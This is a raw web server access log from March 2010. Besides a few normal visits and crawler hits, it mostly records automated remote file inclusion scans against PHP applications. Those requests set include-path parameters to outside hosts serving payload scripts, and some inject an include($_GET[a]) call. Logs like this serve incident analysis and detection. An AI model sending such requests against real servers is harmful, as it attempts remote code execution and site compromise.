202.190.128.77 - - [07/Mar/2010:05:40:30 -0800] "GET / HTTP/1.1" 200 469 "http://www.macdomain.org/forums.php?m=posts&q=30&d=15" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" "www.pixero.net"
202.190.128.77 - - [07/Mar/2010:05:40:34 -0800] "GET /favicon.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" "www.pixero.net"
202.190.128.77 - - [07/Mar/2010:05:41:21 -0800] "GET /pnetsite/releases/PreviewRelease2.sit HTTP/1.1" 200 955056 "http://www.pixero.net/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" "www.pixero.net"
62.140.23.24 - - [07/Mar/2010:05:44:47 -0800] "GET /logs/access_100217.log///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:05:44:47 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:05:44:49 -0800] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:05:44:57 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:05:44:57 -0800] "GET /logs/access_100217.log///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:05:44:57 -0800] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [07/Mar/2010:05:45:13 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://aerconditionatieftin.ro//templates/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [07/Mar/2010:05:45:14 -0800] "GET /logs/access_100218.log%20%20/bookmark4u/lostpasswd.php?env[include_prefix]=http://aerconditionatieftin.ro//templates/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [07/Mar/2010:05:45:14 -0800] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://aerconditionatieftin.ro//templates/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:05:45:40 -0800] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:05:45:40 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:05:45:42 -0800] "GET /logs/access_100217.log%20%20///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:05:45:44 -0800] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:05:45:44 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:05:45:44 -0800] "GET /logs/access_100217.log%20%20///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [07/Mar/2010:05:45:57 -0800] "GET /logs/access_100219.log%20%20/bookmark4u/lostpasswd.php?env[include_prefix]=http://aerconditionatieftin.ro//templates/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:05:46:21 -0800] "GET /logs/access_100222.log%20%20///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:05:46:25 -0800] "GET /logs/access_100222.log%20%20///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [07/Mar/2010:05:46:44 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://aerconditionatieftin.ro//templates/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [07/Mar/2010:05:46:44 -0800] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://aerconditionatieftin.ro//templates/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [07/Mar/2010:05:46:44 -0800] "GET /logs/access_100219.log%20%20/bookmark4u/lostpasswd.php?env[include_prefix]=http://aerconditionatieftin.ro//templates/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [07/Mar/2010:05:46:46 -0800] "GET /logs/access_100214.log%20%20/bookmark4u/lostpasswd.php?env[include_prefix]=http://aerconditionatieftin.ro//templates/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:05:47:28 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:05:47:30 -0800] "GET /logs/access_100217.log///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:05:47:31 -0800] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:05:48:45 -0800] "GET /logs///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:05:48:46 -0800] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
67.195.37.97 - - [07/Mar/2010:05:49:38 -0800] "GET /akifbar/maindp.php HTTP/1.0" 200 6131 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.112.232 - - [07/Mar/2010:05:49:38 -0800] "GET /style/5.style.css HTTP/1.0" 200 2407 "http://puaga.com/akifbar/maindp.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.37.97 - - [07/Mar/2010:05:49:39 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://puaga.com/akifbar/maindp.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.227.136.138 - - [07/Mar/2010:05:51:58 -0800] "GET /logs/access_100221.log//skin/zero_vote/ask_password.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:05:51:58 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:05:51:58 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:05:52:07 -0800] "GET /logs/access_100201.log//skin/zero_vote/ask_password.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:05:52:17 -0800] "GET /logs/access_100204.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:05:52:17 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:05:52:17 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:05:52:36 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:05:52:36 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:05:52:37 -0800] "GET /logs/access_100215.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:05:52:37 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:05:52:38 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:05:52:39 -0800] "GET /logs/access_100215.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:05:53:07 -0800] "GET /logs/access_100215.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:05:53:07 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:05:53:07 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:05:54:15 -0800] "GET /logs/access_100215.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.222.4.218 - - [07/Mar/2010:05:54:37 -0800] "GET /robots.txt HTTP/1.0" 200 36 "http://www.puaga.com/robots.txt" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.puaga.com"
74.222.4.218 - - [07/Mar/2010:05:54:37 -0800] "GET / HTTP/1.0" 200 3626 "http://www.puaga.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.puaga.com"
74.222.4.218 - - [07/Mar/2010:05:54:46 -0800] "GET /robots.txt HTTP/1.0" 200 36 "http://www.puaga.com/robots.txt" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.puaga.com"
74.222.4.218 - - [07/Mar/2010:05:54:46 -0800] "GET /style/imagehover.js HTTP/1.0" 200 1410 "http://www.puaga.com/style/imagehover.js" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:05:55:16 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:05:55:16 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:05:55:16 -0800] "GET /logs/access_100221.log//skin/zero_vote/ask_password.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:05:55:25 -0800] "GET /logs/access_100201.log//skin/zero_vote/ask_password.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:05:56:07 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:05:56:07 -0800] "GET /logs/access_100221.log//skin/zero_vote/ask_password.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:05:56:07 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:05:56:19 -0800] "GET /logs/access_100201.log//skin/zero_vote/ask_password.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:06:00:20 -0800] "GET /logs/access_100224.log%20%20/main.php?pagina=http://boats.uksi.ru/sh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:06:00:20 -0800] "GET /logs/main.php?pagina=http://boats.uksi.ru/sh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:06:00:20 -0800] "GET /main.php?pagina=http://boats.uksi.ru/sh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:06:00:25 -0800] "GET /logs//include/lib.inc.php?site_path=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:06:00:25 -0800] "GET /logs/access_100226.log%20%20//include/lib.inc.php?site_path=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:06:00:27 -0800] "GET /include/lib.inc.php?site_path=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:06:02:22 -0800] "GET /include/lib.inc.php?site_path=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:06:02:22 -0800] "GET /logs//include/lib.inc.php?site_path=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:06:02:23 -0800] "GET /logs/access_100226.log%20%20//include/lib.inc.php?site_path=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:06:04:08 -0800] "GET /logs//include/lib.inc.php?site_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:06:04:08 -0800] "GET /logs/access_100226.log%20%20//include/lib.inc.php?site_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:06:04:09 -0800] "GET /include/lib.inc.php?site_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:06:05:27 -0800] "GET /logs/access_100225.log%20%20/main.php?pagina=http://boats.uksi.ru/sh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:06:05:49 -0800] "GET /logs/access_100202.log%20%20/main.php?pagina=http://boats.uksi.ru/sh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [07/Mar/2010:06:07:31 -0800] "GET /include/mail.inc.php?root=http://art-investments.eu/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [07/Mar/2010:06:07:31 -0800] "GET /logs//include/mail.inc.php?root=http://art-investments.eu/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [07/Mar/2010:06:07:31 -0800] "GET /logs/access_100202.log%20%20//include/mail.inc.php?root=http://art-investments.eu/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [07/Mar/2010:06:08:24 -0800] "GET /logs/access_100226.log%20%20//include/mail.inc.php?root=http://art-investments.eu/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.250.255.242 - - [07/Mar/2010:06:09:18 -0800] "GET /services/ HTTP/1.1" 404 5258 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:06:10:03 -0800] "GET /logs///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:06:10:04 -0800] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
212.52.167.61 - - [07/Mar/2010:06:12:18 -0800] "GET ////zboard//include/print_category.php?setup[use_category]=1&dir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.52.167.61 - - [07/Mar/2010:06:12:18 -0800] "GET /logs/access_100213.log/////zboard//include/print_category.php?setup[use_category]=1&dir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.52.167.61 - - [07/Mar/2010:06:12:18 -0800] "GET /logs/////zboard//include/print_category.php?setup[use_category]=1&dir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.52.167.61 - - [07/Mar/2010:06:12:42 -0800] "GET ////zboard//include/print_category.php?setup[use_category]=1&dir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.52.167.61 - - [07/Mar/2010:06:12:42 -0800] "GET /logs/////zboard//include/print_category.php?setup[use_category]=1&dir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.52.167.61 - - [07/Mar/2010:06:12:42 -0800] "GET /logs/access_100213.log/////zboard//include/print_category.php?setup[use_category]=1&dir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.52.167.61 - - [07/Mar/2010:06:13:12 -0800] "GET /logs/access_100128.log/////zboard//include/print_category.php?setup[use_category]=1&dir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:06:13:31 -0800] "GET /plugins/payment/cc_core/cc_core.inc.php?config[root_dir]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
67.227.136.138 - - [07/Mar/2010:06:13:31 -0800] "GET /module//plugins/payment/cc_core/cc_core.inc.php?config[root_dir]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
67.227.136.138 - - [07/Mar/2010:06:13:32 -0800] "GET /module/setup.php//plugins/payment/cc_core/cc_core.inc.php?config[root_dir]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 200 1720 "-" "Mozilla/5.0" "puaga.com"
212.52.167.61 - - [07/Mar/2010:06:13:33 -0800] "GET /logs/access_100128.log/////zboard//include/print_category.php?setup[use_category]=1&dir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [07/Mar/2010:06:13:35 -0800] "GET /logs/config.php?path_to_root=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [07/Mar/2010:06:13:35 -0800] "GET /logs/access_100217.log%20%20/config.php?path_to_root=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [07/Mar/2010:06:13:35 -0800] "GET /config.php?path_to_root=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [07/Mar/2010:06:13:47 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [07/Mar/2010:06:13:47 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [07/Mar/2010:06:13:48 -0800] "GET /logs/access_100209.log//skin/zero_vote/ask_password.php?dir=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [07/Mar/2010:06:13:58 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [07/Mar/2010:06:13:59 -0800] "GET /logs/access_100209.log//skin/zero_vote/ask_password.php?dir=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [07/Mar/2010:06:13:59 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [07/Mar/2010:06:14:43 -0800] "GET /logs/access_100218.log//skin/zero_vote/ask_password.php?dir=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [07/Mar/2010:06:14:44 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [07/Mar/2010:06:14:44 -0800] "GET /logs/access_100204.log/convert/mvcw.php?vwar_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [07/Mar/2010:06:14:46 -0800] "GET /convert/mvcw.php?vwar_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [07/Mar/2010:06:14:56 -0800] "GET /logs/access_100218.log//skin/zero_vote/ask_password.php?dir=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:06:15:24 -0800] "GET /?INCLUDE_FOLDER=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
